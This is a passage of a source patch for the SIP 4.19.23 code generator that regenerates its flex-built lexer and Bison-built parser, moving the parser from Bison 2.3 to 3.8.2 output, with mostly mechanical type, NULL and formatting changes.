--(yy_buffer_stack_top); + + if (YY_CURRENT_BUFFER) { +- yy_load_buffer_state( ); ++ yy_load_buffer_state( ); + (yy_did_buffer_switch_on_eof) = 1; + } + } +@@ -3696,15 +3737,15 @@ static void yyensure_buffer_stack (void) + * scanner will even need a stack. We use 2 instead of 1 to avoid an + * immediate realloc on the next call. + */ +- num_to_alloc = 1; ++ num_to_alloc = 1; /* After all that talk, this was set to 1 anyways... */ + (yy_buffer_stack) = (struct yy_buffer_state**)yyalloc + (num_to_alloc * sizeof(struct yy_buffer_state*) + ); + if ( ! 
(yy_buffer_stack) ) + YY_FATAL_ERROR( "out of dynamic memory in yyensure_buffer_stack()" ); +- ++ + memset((yy_buffer_stack), 0, num_to_alloc * sizeof(struct yy_buffer_state*)); +- ++ + (yy_buffer_stack_max) = num_to_alloc; + (yy_buffer_stack_top) = 0; + return; +@@ -3713,7 +3754,7 @@ static void yyensure_buffer_stack (void) + if ((yy_buffer_stack_top) >= ((yy_buffer_stack_max)) - 1){ + + /* Increase the buffer to prepare for a possible push. */ +- int grow_size = 8 /* arbitrary grow size */; ++ yy_size_t grow_size = 8 /* arbitrary grow size */; + + num_to_alloc = (yy_buffer_stack_max) + grow_size; + (yy_buffer_stack) = (struct yy_buffer_state**)yyrealloc +@@ -3733,7 +3774,7 @@ static void yyensure_buffer_stack (void) + * @param base the character buffer + * @param size the size in bytes of the character buffer + * +- * @return the newly allocated buffer state object. ++ * @return the newly allocated buffer state object. + */ + YY_BUFFER_STATE yy_scan_buffer (char * base, yy_size_t size ) + { +@@ -3743,23 +3784,23 @@ YY_BUFFER_STATE yy_scan_buffer (char * + base[size-2] != YY_END_OF_BUFFER_CHAR || + base[size-1] != YY_END_OF_BUFFER_CHAR ) + /* They forgot to leave room for the EOB's. */ +- return 0; ++ return NULL; + +- b = (YY_BUFFER_STATE) yyalloc(sizeof( struct yy_buffer_state ) ); ++ b = (YY_BUFFER_STATE) yyalloc( sizeof( struct yy_buffer_state ) ); + if ( ! 
b ) + YY_FATAL_ERROR( "out of dynamic memory in yy_scan_buffer()" ); + +- b->yy_buf_size = size - 2; /* "- 2" to take care of EOB's */ ++ b->yy_buf_size = (int) (size - 2); /* "- 2" to take care of EOB's */ + b->yy_buf_pos = b->yy_ch_buf = base; + b->yy_is_our_buffer = 0; +- b->yy_input_file = 0; ++ b->yy_input_file = NULL; + b->yy_n_chars = b->yy_buf_size; + b->yy_is_interactive = 0; + b->yy_at_bol = 1; + b->yy_fill_buffer = 0; + b->yy_buffer_status = YY_BUFFER_NEW; + +- yy_switch_to_buffer(b ); ++ yy_switch_to_buffer( b ); + + return b; + } +@@ -3772,28 +3813,29 @@ YY_BUFFER_STATE yy_scan_buffer (char * + * @note If you want to scan bytes that may contain NUL values, then use + * yy_scan_bytes() instead. + */ +-YY_BUFFER_STATE yy_scan_string (yyconst char * yystr ) ++YY_BUFFER_STATE yy_scan_string (const char * yystr ) + { + +- return yy_scan_bytes(yystr,strlen(yystr) ); ++ return yy_scan_bytes( yystr, (int) strlen(yystr) ); + } + + /** Setup the input buffer state to scan the given bytes. The next call to yylex() will + * scan from a @e copy of @a bytes. +- * @param bytes the byte buffer to scan +- * @param len the number of bytes in the buffer pointed to by @a bytes. ++ * @param yybytes the byte buffer to scan ++ * @param _yybytes_len the number of bytes in the buffer pointed to by @a bytes. + * + * @return the newly allocated buffer state object. + */ +-YY_BUFFER_STATE yy_scan_bytes (yyconst char * yybytes, yy_size_t _yybytes_len ) ++YY_BUFFER_STATE yy_scan_bytes (const char * yybytes, int _yybytes_len ) + { + YY_BUFFER_STATE b; + char *buf; +- yy_size_t n, i; ++ yy_size_t n; ++ int i; + + /* Get memory for full buffer, including space for trailing EOB's. */ +- n = _yybytes_len + 2; +- buf = (char *) yyalloc(n ); ++ n = (yy_size_t) (_yybytes_len + 2); ++ buf = (char *) yyalloc( n ); + if ( ! 
buf ) + YY_FATAL_ERROR( "out of dynamic memory in yy_scan_bytes()" ); + +@@ -3802,7 +3844,7 @@ YY_BUFFER_STATE yy_scan_bytes (yyconst + + buf[_yybytes_len] = buf[_yybytes_len+1] = YY_END_OF_BUFFER_CHAR; + +- b = yy_scan_buffer(buf,n ); ++ b = yy_scan_buffer( buf, n ); + if ( ! b ) + YY_FATAL_ERROR( "bad buffer in yy_scan_bytes()" ); + +@@ -3814,20 +3856,21 @@ YY_BUFFER_STATE yy_scan_bytes (yyconst + return b; + } + +- static void yy_push_state (int new_state ) ++ static void yy_push_state (int _new_state ) + { + if ( (yy_start_stack_ptr) >= (yy_start_stack_depth) ) + { + yy_size_t new_size; + + (yy_start_stack_depth) += YY_START_STACK_INCR; +- new_size = (yy_start_stack_depth) * sizeof( int ); ++ new_size = (yy_size_t) (yy_start_stack_depth) * sizeof( int ); + + if ( ! (yy_start_stack) ) +- (yy_start_stack) = (int *) yyalloc(new_size ); ++ (yy_start_stack) = (int *) yyalloc( new_size ); + + else +- (yy_start_stack) = (int *) yyrealloc((void *) (yy_start_stack),new_size ); ++ (yy_start_stack) = (int *) yyrealloc( ++ (void *) (yy_start_stack), new_size ); + + if ( ! (yy_start_stack) ) + YY_FATAL_ERROR( "out of memory expanding start-condition stack" ); +@@ -3835,7 +3878,7 @@ YY_BUFFER_STATE yy_scan_bytes (yyconst + + (yy_start_stack)[(yy_start_stack_ptr)++] = YY_START; + +- BEGIN(new_state); ++ BEGIN(_new_state); + } + + static void yy_pop_state (void) +@@ -3855,9 +3898,9 @@ YY_BUFFER_STATE yy_scan_bytes (yyconst + #define YY_EXIT_FAILURE 2 + #endif + +-static void yy_fatal_error (yyconst char* msg ) ++static void yynoreturn yy_fatal_error (const char* msg ) + { +- (void) fprintf( stderr, "%s\n", msg ); ++ fprintf( stderr, "%s\n", msg ); + exit( YY_EXIT_FAILURE ); + } + +@@ -3885,7 +3928,7 @@ static void yy_fatal_error (yyconst char + */ + int yyget_lineno (void) + { +- ++ + return yylineno; + } + +@@ -3908,7 +3951,7 @@ FILE *yyget_out (void) + /** Get the length of the current token. 
+ * + */ +-yy_size_t yyget_leng (void) ++int yyget_leng (void) + { + return yyleng; + } +@@ -3923,29 +3966,29 @@ char *yyget_text (void) + } + + /** Set the current line number. +- * @param line_number ++ * @param _line_number line number + * + */ +-void yyset_lineno (int line_number ) ++void yyset_lineno (int _line_number ) + { + +- yylineno = line_number; ++ yylineno = _line_number; + } + + /** Set the input stream. This does not discard the current + * input buffer. +- * @param in_str A readable stream. ++ * @param _in_str A readable stream. + * + * @see yy_switch_to_buffer + */ +-void yyset_in (FILE * in_str ) ++void yyset_in (FILE * _in_str ) + { +- yyin = in_str ; ++ yyin = _in_str ; + } + +-void yyset_out (FILE * out_str ) ++void yyset_out (FILE * _out_str ) + { +- yyout = out_str ; ++ yyout = _out_str ; + } + + int yyget_debug (void) +@@ -3953,9 +3996,9 @@ int yyget_debug (void) + return yy_flex_debug; + } + +-void yyset_debug (int bdebug ) ++void yyset_debug (int _bdebug ) + { +- yy_flex_debug = bdebug ; ++ yy_flex_debug = _bdebug ; + } + + static int yy_init_globals (void) +@@ -3964,10 +4007,10 @@ static int yy_init_globals (void) + * This function is called from yylex_destroy(), so don't allocate here. + */ + +- (yy_buffer_stack) = 0; ++ (yy_buffer_stack) = NULL; + (yy_buffer_stack_top) = 0; + (yy_buffer_stack_max) = 0; +- (yy_c_buf_p) = (char *) 0; ++ (yy_c_buf_p) = NULL; + (yy_init) = 0; + (yy_start) = 0; + +@@ -3980,8 +4023,8 @@ static int yy_init_globals (void) + yyin = stdin; + yyout = stdout; + #else +- yyin = (FILE *) 0; +- yyout = (FILE *) 0; ++ yyin = NULL; ++ yyout = NULL; + #endif + + /* For future reference: Set errno on error, since we are called by +@@ -3996,7 +4039,7 @@ int yylex_destroy (void) + + /* Pop the buffer stack, destroying each element. 
*/ + while(YY_CURRENT_BUFFER){ +- yy_delete_buffer(YY_CURRENT_BUFFER ); ++ yy_delete_buffer( YY_CURRENT_BUFFER ); + YY_CURRENT_BUFFER_LVALUE = NULL; + yypop_buffer_state(); + } +@@ -4006,7 +4049,7 @@ int yylex_destroy (void) + (yy_buffer_stack) = NULL; + + /* Destroy the start condition stack. */ +- yyfree((yy_start_stack) ); ++ yyfree( (yy_start_stack) ); + (yy_start_stack) = NULL; + + /* Reset the globals. This is important in a non-reentrant scanner so the next time +@@ -4021,18 +4064,19 @@ int yylex_destroy (void) + */ + + #ifndef yytext_ptr +-static void yy_flex_strncpy (char* s1, yyconst char * s2, int n ) ++static void yy_flex_strncpy (char* s1, const char * s2, int n ) + { +- register int i; ++ ++ int i; + for ( i = 0; i < n; ++i ) + s1[i] = s2[i]; + } + #endif + + #ifdef YY_NEED_STRLEN +-static int yy_flex_strlen (yyconst char * s ) ++static int yy_flex_strlen (const char * s ) + { +- register int n; ++ int n; + for ( n = 0; s[n]; ++n ) + ; + +@@ -4042,11 +4086,12 @@ static int yy_flex_strlen (yyconst char + + void *yyalloc (yy_size_t size ) + { +- return (void *) malloc( size ); ++ return malloc(size); + } + + void *yyrealloc (void * ptr, yy_size_t size ) + { ++ + /* The cast to (char *) in the following accommodates both + * implementations that use char* generic pointers, and those + * that use void* generic pointers. It works with the latter +@@ -4054,18 +4099,17 @@ void *yyrealloc (void * ptr, yy_size_t + * any pointer type to void*, and deal with argument conversions + * as though doing an assignment. 
+ */ +- return (void *) realloc( (char *) ptr, size ); ++ return realloc(ptr, size); + } + + void yyfree (void * ptr ) + { +- free( (char *) ptr ); /* see yyrealloc() for (char *) cast */ ++ free( (char *) ptr ); /* see yyrealloc() for (char *) cast */ + } + + #define YYTABLES_NAME "yytables" + +-#line 633 "sip-4.19.23/sipgen/metasrc/lexer.l" +- ++#line 635 "lexer.l" + + + /* +Index: sip-4.19.23/sipgen/parser.c +=================================================================== +--- sip-4.19.23.orig/sipgen/parser.c ++++ sip-4.19.23/sipgen/parser.c +@@ -1,14 +1,14 @@ +-/* A Bison parser, made by GNU Bison 2.3. */ ++/* A Bison parser, made by GNU Bison 3.8.2. */ + +-/* Skeleton implementation for Bison's Yacc-like parsers in C ++/* Bison implementation for Yacc-like parsers in C + +- Copyright (C) 1984, 1989, 1990, 2000, 2001, 2002, 2003, 2004, 2005, 2006 +- Free Software Foundation, Inc. ++ Copyright (C) 1984, 1989-1990, 2000-2015, 2018-2021 Free Software Foundation, ++ Inc. + +- This program is free software; you can redistribute it and/or modify ++ This program is free software: you can redistribute it and/or modify + it under the terms of the GNU General Public License as published by +- the Free Software Foundation; either version 2, or (at your option) +- any later version. ++ the Free Software Foundation, either version 3 of the License, or ++ (at your option) any later version. + + This program is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of +@@ -16,9 +16,7 @@ + GNU General Public License for more details. + + You should have received a copy of the GNU General Public License +- along with this program; if not, write to the Free Software +- Foundation, Inc., 51 Franklin Street, Fifth Floor, +- Boston, MA 02110-1301, USA. */ ++ along with this program. If not, see <https://www.gnu.org/licenses/>. 
*/ + + /* As a special exception, you may create a larger work that contains + part or all of the Bison parser skeleton and distribute that work +@@ -36,6 +34,10 @@ + /* C LALR(1) parser skeleton written by Richard Stallman, by + simplifying the original so-called "semantic" parser. */ + ++/* DO NOT RELY ON FEATURES THAT ARE NOT DOCUMENTED in the manual, ++ especially those whose name start with YY_ or yy_. They are ++ private implementation details that can be changed or removed. */ ++ + /* All symbols defined below should begin with yy or YY, to avoid + infringing on user name space. This should be done even for local + variables, as they might otherwise be expanded by user macros. +@@ -43,11 +45,11 @@ + define necessary library symbols; they are noted "INFRINGES ON + USER NAME SPACE" below. */ + +-/* Identify Bison output. */ +-#define YYBISON 1 ++/* Identify Bison output, and Bison version. */ ++#define YYBISON 30802 + +-/* Bison version. */ +-#define YYBISON_VERSION "2.3" ++/* Bison version string. */ ++#define YYBISON_VERSION "3.8.2" + + /* Skeleton name. */ + #define YYSKELETON_NAME "yacc.c" +@@ -55,324 +57,17 @@ + /* Pure parsers. */ + #define YYPURE 0 + +-/* Using locations. */ +-#define YYLSP_NEEDED 0 +- ++/* Push parsers. */ ++#define YYPUSH 0 + +- +-/* Tokens. */ +-#ifndef YYTOKENTYPE +-# define YYTOKENTYPE +- /* Put the tokens into the symbol table, so that GDB and other debuggers +- know about them. 
*/ +- enum yytokentype { +- TK_API = 258, +- TK_AUTOPYNAME = 259, +- TK_DEFDOCSTRFMT = 260, +- TK_DEFDOCSTRSIG = 261, +- TK_DEFENCODING = 262, +- TK_PLUGIN = 263, +- TK_VIRTERRORHANDLER = 264, +- TK_EXPTYPEHINTCODE = 265, +- TK_TYPEHINTCODE = 266, +- TK_DOCSTRING = 267, +- TK_DOC = 268, +- TK_EXPORTEDDOC = 269, +- TK_EXTRACT = 270, +- TK_MAKEFILE = 271, +- TK_ACCESSCODE = 272, +- TK_GETCODE = 273, +- TK_SETCODE = 274, +- TK_PREINITCODE = 275, +- TK_INITCODE = 276, +- TK_POSTINITCODE = 277, +- TK_FINALCODE = 278, +- TK_UNITCODE = 279, +- TK_UNITPOSTINCLUDECODE = 280, +- TK_MODCODE = 281, +- TK_TYPECODE = 282, +- TK_PREPYCODE = 283, +- TK_COPYING = 284, +- TK_MAPPEDTYPE = 285, +- TK_CODELINE = 286, +- TK_IF = 287, +- TK_END = 288, +- TK_NAME_VALUE = 289, +- TK_PATH_VALUE = 290, +- TK_STRING_VALUE = 291, +- TK_VIRTUALCATCHERCODE = 292, +- TK_TRAVERSECODE = 293, +- TK_CLEARCODE = 294, +- TK_GETBUFFERCODE = 295, +- TK_RELEASEBUFFERCODE = 296, +- TK_READBUFFERCODE = 297, +- TK_WRITEBUFFERCODE = 298, +- TK_SEGCOUNTCODE = 299, +- TK_CHARBUFFERCODE = 300, +- TK_PICKLECODE = 301, +- TK_VIRTUALCALLCODE = 302, +- TK_METHODCODE = 303, +- TK_PREMETHODCODE = 304, +- TK_INSTANCECODE = 305, +- TK_FROMTYPE = 306, +- TK_TOTYPE = 307, +- TK_TOSUBCLASS = 308, +- TK_INCLUDE = 309, +- TK_OPTINCLUDE = 310, +- TK_IMPORT = 311, +- TK_EXPHEADERCODE = 312, +- TK_MODHEADERCODE = 313, +- TK_TYPEHEADERCODE = 314, +- TK_MODULE = 315, +- TK_CMODULE = 316, +- TK_CONSMODULE = 317, +- TK_COMPOMODULE = 318, +- TK_CLASS = 319, +- TK_STRUCT = 320, +- TK_PUBLIC = 321, +- TK_PROTECTED = 322, +- TK_PRIVATE = 323, +- TK_SIGNALS = 324, +- TK_SIGNAL_METHOD = 325, +- TK_SLOTS = 326, +- TK_SLOT_METHOD = 327, +- TK_BOOL = 328, +- TK_SHORT = 329, +- TK_INT = 330, +- TK_LONG = 331, +- TK_FLOAT = 332, +- TK_DOUBLE = 333, +- TK_CHAR = 334, +- TK_WCHAR_T = 335, +- TK_VOID = 336, +- TK_PYOBJECT = 337, +- TK_PYTUPLE = 338, +- TK_PYLIST = 339, +- TK_PYDICT = 340, +- TK_PYCALLABLE = 341, +- TK_PYSLICE = 342, +- TK_PYTYPE 
= 343, +- TK_PYBUFFER = 344, +- TK_VIRTUAL = 345, +- TK_ENUM = 346, +- TK_SIGNED = 347, +- TK_UNSIGNED = 348, +- TK_SCOPE = 349, +- TK_LOGICAL_OR = 350, +- TK_CONST = 351, +- TK_STATIC = 352, +- TK_SIPSIGNAL = 353, +- TK_SIPSLOT = 354, +- TK_SIPANYSLOT = 355, +- TK_SIPRXCON = 356, +- TK_SIPRXDIS = 357, +- TK_SIPSLOTCON = 358, +- TK_SIPSLOTDIS = 359, +- TK_SIPSSIZET = 360, +- TK_SIZET = 361, +- TK_NUMBER_VALUE = 362, +- TK_REAL_VALUE = 363, +- TK_TYPEDEF = 364, +- TK_NAMESPACE = 365, +- TK_TIMELINE = 366, +- TK_PLATFORMS = 367, +- TK_FEATURE = 368, +- TK_LICENSE = 369, +- TK_QCHAR_VALUE = 370, +- TK_TRUE_VALUE = 371, +- TK_FALSE_VALUE = 372, +- TK_NULL_VALUE = 373, +- TK_OPERATOR = 374, +- TK_THROW = 375, +- TK_QOBJECT = 376, +- TK_EXCEPTION = 377, +- TK_RAISECODE = 378, +- TK_EXPLICIT = 379, +- TK_TEMPLATE = 380, +- TK_FINAL = 381, +- TK_ELLIPSIS = 382, +- TK_DEFMETATYPE = 383, +- TK_DEFSUPERTYPE = 384, +- TK_PROPERTY = 385, +- TK_HIDE_NS = 386, +- TK_FORMAT = 387, +- TK_GET = 388, +- TK_ID = 389, +- TK_KWARGS = 390, +- TK_LANGUAGE = 391, +- TK_LICENSEE = 392, +- TK_NAME = 393, +- TK_OPTIONAL = 394, +- TK_ORDER = 395, +- TK_REMOVELEADING = 396, +- TK_SET = 397, +- TK_SIGNATURE = 398, +- TK_TIMESTAMP = 399, +- TK_TYPE = 400, +- TK_USEARGNAMES = 401, +- TK_USELIMITEDAPI = 402, +- TK_ALLRAISEPYEXC = 403, +- TK_CALLSUPERINIT = 404, +- TK_DEFERRORHANDLER = 405, +- TK_VERSION = 406 +- }; +-#endif +-/* Tokens. 
*/ +-#define TK_API 258 +-#define TK_AUTOPYNAME 259 +-#define TK_DEFDOCSTRFMT 260 +-#define TK_DEFDOCSTRSIG 261 +-#define TK_DEFENCODING 262 +-#define TK_PLUGIN 263 +-#define TK_VIRTERRORHANDLER 264 +-#define TK_EXPTYPEHINTCODE 265 +-#define TK_TYPEHINTCODE 266 +-#define TK_DOCSTRING 267 +-#define TK_DOC 268 +-#define TK_EXPORTEDDOC 269 +-#define TK_EXTRACT 270 +-#define TK_MAKEFILE 271 +-#define TK_ACCESSCODE 272 +-#define TK_GETCODE 273 +-#define TK_SETCODE 274 +-#define TK_PREINITCODE 275 +-#define TK_INITCODE 276 +-#define TK_POSTINITCODE 277 +-#define TK_FINALCODE 278 +-#define TK_UNITCODE 279 +-#define TK_UNITPOSTINCLUDECODE 280 +-#define TK_MODCODE 281 +-#define TK_TYPECODE 282 +-#define TK_PREPYCODE 283 +-#define TK_COPYING 284 +-#define TK_MAPPEDTYPE 285 +-#define TK_CODELINE 286 +-#define TK_IF 287 +-#define TK_END 288 +-#define TK_NAME_VALUE 289 +-#define TK_PATH_VALUE 290 +-#define TK_STRING_VALUE 291 +-#define TK_VIRTUALCATCHERCODE 292 +-#define TK_TRAVERSECODE 293 +-#define TK_CLEARCODE 294 +-#define TK_GETBUFFERCODE 295 +-#define TK_RELEASEBUFFERCODE 296 +-#define TK_READBUFFERCODE 297 +-#define TK_WRITEBUFFERCODE 298 +-#define TK_SEGCOUNTCODE 299 +-#define TK_CHARBUFFERCODE 300 +-#define TK_PICKLECODE 301 +-#define TK_VIRTUALCALLCODE 302 +-#define TK_METHODCODE 303 +-#define TK_PREMETHODCODE 304 +-#define TK_INSTANCECODE 305 +-#define TK_FROMTYPE 306 +-#define TK_TOTYPE 307 +-#define TK_TOSUBCLASS 308 +-#define TK_INCLUDE 309 +-#define TK_OPTINCLUDE 310 +-#define TK_IMPORT 311 +-#define TK_EXPHEADERCODE 312 +-#define TK_MODHEADERCODE 313 +-#define TK_TYPEHEADERCODE 314 +-#define TK_MODULE 315 +-#define TK_CMODULE 316 +-#define TK_CONSMODULE 317 +-#define TK_COMPOMODULE 318 +-#define TK_CLASS 319 +-#define TK_STRUCT 320 +-#define TK_PUBLIC 321 +-#define TK_PROTECTED 322 +-#define TK_PRIVATE 323 +-#define TK_SIGNALS 324 +-#define TK_SIGNAL_METHOD 325 +-#define TK_SLOTS 326 +-#define TK_SLOT_METHOD 327 +-#define TK_BOOL 328 +-#define TK_SHORT 329 
+-#define TK_INT 330 +-#define TK_LONG 331 +-#define TK_FLOAT 332 +-#define TK_DOUBLE 333 +-#define TK_CHAR 334 +-#define TK_WCHAR_T 335 +-#define TK_VOID 336 +-#define TK_PYOBJECT 337 +-#define TK_PYTUPLE 338 +-#define TK_PYLIST 339 +-#define TK_PYDICT 340 +-#define TK_PYCALLABLE 341 +-#define TK_PYSLICE 342 +-#define TK_PYTYPE 343 +-#define TK_PYBUFFER 344 +-#define TK_VIRTUAL 345 +-#define TK_ENUM 346 +-#define TK_SIGNED 347 +-#define TK_UNSIGNED 348 +-#define TK_SCOPE 349 +-#define TK_LOGICAL_OR 350 +-#define TK_CONST 351 +-#define TK_STATIC 352 +-#define TK_SIPSIGNAL 353 +-#define TK_SIPSLOT 354 +-#define TK_SIPANYSLOT 355 +-#define TK_SIPRXCON 356 +-#define TK_SIPRXDIS 357 +-#define TK_SIPSLOTCON 358 +-#define TK_SIPSLOTDIS 359 +-#define TK_SIPSSIZET 360 +-#define TK_SIZET 361 +-#define TK_NUMBER_VALUE 362 +-#define TK_REAL_VALUE 363 +-#define TK_TYPEDEF 364 +-#define TK_NAMESPACE 365 +-#define TK_TIMELINE 366 +-#define TK_PLATFORMS 367 +-#define TK_FEATURE 368 +-#define TK_LICENSE 369 +-#define TK_QCHAR_VALUE 370 +-#define TK_TRUE_VALUE 371 +-#define TK_FALSE_VALUE 372 +-#define TK_NULL_VALUE 373 +-#define TK_OPERATOR 374 +-#define TK_THROW 375 +-#define TK_QOBJECT 376 +-#define TK_EXCEPTION 377 +-#define TK_RAISECODE 378 +-#define TK_EXPLICIT 379 +-#define TK_TEMPLATE 380 +-#define TK_FINAL 381 +-#define TK_ELLIPSIS 382 +-#define TK_DEFMETATYPE 383 +-#define TK_DEFSUPERTYPE 384 +-#define TK_PROPERTY 385 +-#define TK_HIDE_NS 386 +-#define TK_FORMAT 387 +-#define TK_GET 388 +-#define TK_ID 389 +-#define TK_KWARGS 390 +-#define TK_LANGUAGE 391 +-#define TK_LICENSEE 392 +-#define TK_NAME 393 +-#define TK_OPTIONAL 394 +-#define TK_ORDER 395 +-#define TK_REMOVELEADING 396 +-#define TK_SET 397 +-#define TK_SIGNATURE 398 +-#define TK_TIMESTAMP 399 +-#define TK_TYPE 400 +-#define TK_USEARGNAMES 401 +-#define TK_USELIMITEDAPI 402 +-#define TK_ALLRAISEPYEXC 403 +-#define TK_CALLSUPERINIT 404 +-#define TK_DEFERRORHANDLER 405 +-#define TK_VERSION 406 ++/* Pull parsers. 
*/ ++#define YYPULL 1 + + + + +-/* Copy the first part of user declarations. */ +-#line 19 "sip-4.19.23/sipgen/metasrc/parser.y" ++/* First part of user prologue. */ ++#line 19 "parser.y" + + #include <stdlib.h> + #include <string.h> +@@ -539,9 +234,9 @@ static void addProperty(sipSpec *pt, mod + docstringDef *docstring); + static moduleDef *configureModule(sipSpec *pt, moduleDef *module, + const char *filename, const char *name, int c_module, KwArgs kwargs, +- int use_arg_names, int use_limited_api, int call_super_init, +- int all_raise_py_exc, const char *def_error_handler, +- docstringDef *docstring); ++ int use_arg_names, int py_ssize_t_clean, int use_limited_api, ++ int call_super_init, int all_raise_py_exc, ++ const char *def_error_handler, docstringDef *docstring); + static void addAutoPyName(moduleDef *mod, const char *remove_leading); + static KwArgs convertKwArgs(const char *kwargs); + static void checkAnnos(optFlags *annos, const char *valid[]); +@@ -555,117 +250,555 @@ static int isBackstop(qualDef *qd); + static void checkEllipsis(signatureDef *sd); + static scopedNameDef *fullyQualifiedName(scopedNameDef *snd); + ++#line 254 "../parser.c" + +-/* Enabling traces. */ +-#ifndef YYDEBUG +-# define YYDEBUG 0 +-#endif +- +-/* Enabling verbose error messages. */ +-#ifdef YYERROR_VERBOSE +-# undef YYERROR_VERBOSE +-# define YYERROR_VERBOSE 1 +-#else +-# define YYERROR_VERBOSE 0 +-#endif +- +-/* Enabling the token table. */ +-#ifndef YYTOKEN_TABLE +-# define YYTOKEN_TABLE 0 +-#endif +- +-#if ! defined YYSTYPE && ! 
defined YYSTYPE_IS_DECLARED +-typedef union YYSTYPE +-#line 202 "sip-4.19.23/sipgen/metasrc/parser.y" +-{ +- char qchar; +- char *text; +- long number; +- double real; +- argDef memArg; +- signatureDef signature; +- signatureDef *optsignature; +- throwArgs *throwlist; +- codeBlock *codeb; +- docstringDef *docstr; +- valueDef value; +- valueDef *valp; +- optFlags optflags; +- optFlag flag; +- scopedNameDef *scpvalp; +- fcallDef fcall; +- int boolean; +- exceptionDef exceptionbase; +- classDef *klass; +- apiCfg api; +- autoPyNameCfg autopyname; +- compModuleCfg compmodule; +- consModuleCfg consmodule; +- defDocstringFmtCfg defdocstringfmt; +- defDocstringSigCfg defdocstringsig; +- defEncodingCfg defencoding; +- defMetatypeCfg defmetatype; +- defSupertypeCfg defsupertype; +- hiddenNsCfg hiddenns; +- exceptionCfg exception; +- docstringCfg docstring; +- extractCfg extract; +- featureCfg feature; +- licenseCfg license; +- importCfg import; +- includeCfg include; +- moduleCfg module; +- pluginCfg plugin; +- propertyCfg property; +- variableCfg variable; +- vehCfg veh; +- int token; +-} +-/* Line 193 of yacc.c. */ +-#line 626 "sip-4.19.23/sipgen/parser.c" +- YYSTYPE; +-# define yystype YYSTYPE /* obsolescent; will be withdrawn */ +-# define YYSTYPE_IS_DECLARED 1 +-# define YYSTYPE_IS_TRIVIAL 1 +-#endif +- ++# ifndef YY_CAST ++# ifdef __cplusplus ++# define YY_CAST(Type, Val) static_cast<Type> (Val) ++# define YY_REINTERPRET_CAST(Type, Val) reinterpret_cast<Type> (Val) ++# else ++# define YY_CAST(Type, Val) ((Type) (Val)) ++# define YY_REINTERPRET_CAST(Type, Val) ((Type) (Val)) ++# endif ++# endif ++# ifndef YY_NULLPTR ++# if defined __cplusplus ++# if 201103L <= __cplusplus ++# define YY_NULLPTR nullptr ++# else ++# define YY_NULLPTR 0 ++# endif ++# else ++# define YY_NULLPTR ((void*)0) ++# endif ++# endif + ++#include "parser.h" ++/* Symbol kind. 
*/ ++enum yysymbol_kind_t ++{ ++ YYSYMBOL_YYEMPTY = -2, ++ YYSYMBOL_YYEOF = 0, /* "end of file" */ ++ YYSYMBOL_YYerror = 1, /* error */ ++ YYSYMBOL_YYUNDEF = 2, /* "invalid token" */ ++ YYSYMBOL_TK_API = 3, /* TK_API */ ++ YYSYMBOL_TK_AUTOPYNAME = 4, /* TK_AUTOPYNAME */ ++ YYSYMBOL_TK_DEFDOCSTRFMT = 5, /* TK_DEFDOCSTRFMT */ ++ YYSYMBOL_TK_DEFDOCSTRSIG = 6, /* TK_DEFDOCSTRSIG */ ++ YYSYMBOL_TK_DEFENCODING = 7, /* TK_DEFENCODING */ ++ YYSYMBOL_TK_PLUGIN = 8, /* TK_PLUGIN */ ++ YYSYMBOL_TK_VIRTERRORHANDLER = 9, /* TK_VIRTERRORHANDLER */ ++ YYSYMBOL_TK_EXPTYPEHINTCODE = 10, /* TK_EXPTYPEHINTCODE */ ++ YYSYMBOL_TK_TYPEHINTCODE = 11, /* TK_TYPEHINTCODE */ ++ YYSYMBOL_TK_DOCSTRING = 12, /* TK_DOCSTRING */ ++ YYSYMBOL_TK_DOC = 13, /* TK_DOC */ ++ YYSYMBOL_TK_EXPORTEDDOC = 14, /* TK_EXPORTEDDOC */ ++ YYSYMBOL_TK_EXTRACT = 15, /* TK_EXTRACT */ ++ YYSYMBOL_TK_MAKEFILE = 16, /* TK_MAKEFILE */ ++ YYSYMBOL_TK_ACCESSCODE = 17, /* TK_ACCESSCODE */ ++ YYSYMBOL_TK_GETCODE = 18, /* TK_GETCODE */ ++ YYSYMBOL_TK_SETCODE = 19, /* TK_SETCODE */ ++ YYSYMBOL_TK_PREINITCODE = 20, /* TK_PREINITCODE */ ++ YYSYMBOL_TK_INITCODE = 21, /* TK_INITCODE */ ++ YYSYMBOL_TK_POSTINITCODE = 22, /* TK_POSTINITCODE */ ++ YYSYMBOL_TK_FINALCODE = 23, /* TK_FINALCODE */ ++ YYSYMBOL_TK_UNITCODE = 24, /* TK_UNITCODE */ ++ YYSYMBOL_TK_UNITPOSTINCLUDECODE = 25, /* TK_UNITPOSTINCLUDECODE */ ++ YYSYMBOL_TK_MODCODE = 26, /* TK_MODCODE */ ++ YYSYMBOL_TK_TYPECODE = 27, /* TK_TYPECODE */ ++ YYSYMBOL_TK_PREPYCODE = 28, /* TK_PREPYCODE */ ++ YYSYMBOL_TK_COPYING = 29, /* TK_COPYING */ ++ YYSYMBOL_TK_MAPPEDTYPE = 30, /* TK_MAPPEDTYPE */ ++ YYSYMBOL_TK_CODELINE = 31, /* TK_CODELINE */ ++ YYSYMBOL_TK_IF = 32, /* TK_IF */ ++ YYSYMBOL_TK_END = 33, /* TK_END */ ++ YYSYMBOL_TK_NAME_VALUE = 34, /* TK_NAME_VALUE */ ++ YYSYMBOL_TK_PATH_VALUE = 35, /* TK_PATH_VALUE */ ++ YYSYMBOL_TK_STRING_VALUE = 36, /* TK_STRING_VALUE */ ++ YYSYMBOL_TK_VIRTUALCATCHERCODE = 37, /* TK_VIRTUALCATCHERCODE */ ++ YYSYMBOL_TK_TRAVERSECODE = 38, /* 
